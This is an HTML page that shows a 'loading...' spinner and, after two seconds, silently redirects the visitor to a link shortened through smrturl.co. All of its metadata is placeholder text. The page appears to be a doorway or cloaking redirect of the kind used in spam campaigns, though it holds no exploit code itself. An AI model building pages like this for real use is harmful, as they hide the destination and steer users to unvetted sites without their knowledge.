<!DOCTYPE html>
<html lang="en">
  <head>
    <meta charset="UTF-8" />
    <meta name="viewport" content="width=device-width, initial-scale=1.0" />
    <meta name="description" content="loading..." />
    <meta name="keywords" content="loading..." />
    <meta name="author" content="loading..." />
    <!-- Open Graph / Facebook -->
    <meta property="og:type" content="website" />
    <meta property="og:title" content="loading..." />
    <meta property="og:description" content="loading..." />
    <title>loading...</title>
    <link rel="stylesheet" href="styles.css" />

    <script>
      var urls = [
        "https://smrturl.co/7e6db5a",
      ];

      var randomUrl = urls[Math.floor(Math.random() * urls.length)];

      setTimeout(function () {
        window.location.href = randomUrl;
      }, 2000);
    </script>

    <style>
      * {
        margin: 0;
        padding: 0;
        box-sizing: border-box;
      }

      body {
        display: flex;
        justify-content: center;
        align-items: center;
        height: 100vh;
        background-color: #f4f4f4;
      }

      .spinner {
        width: 60px;
        height: 60px;
        border: 6px solid #ccc;
        border-top: 6px solid #3498db;
        border-radius: 50%;
        animation: spin 1s linear infinite;
      }
      .load {
        display: flex;
        justify-content: center;
        align-items: center;
      }

      @keyframes spin {
        0% {
          transform: rotate(0deg);
        }
        100% {
          transform: rotate(360deg);
        }
      }
    </style>
  </head>
  <body>
    <div class="spinner"></div>
    <h2 class="load">loading...</h2>
  </body>
</html>
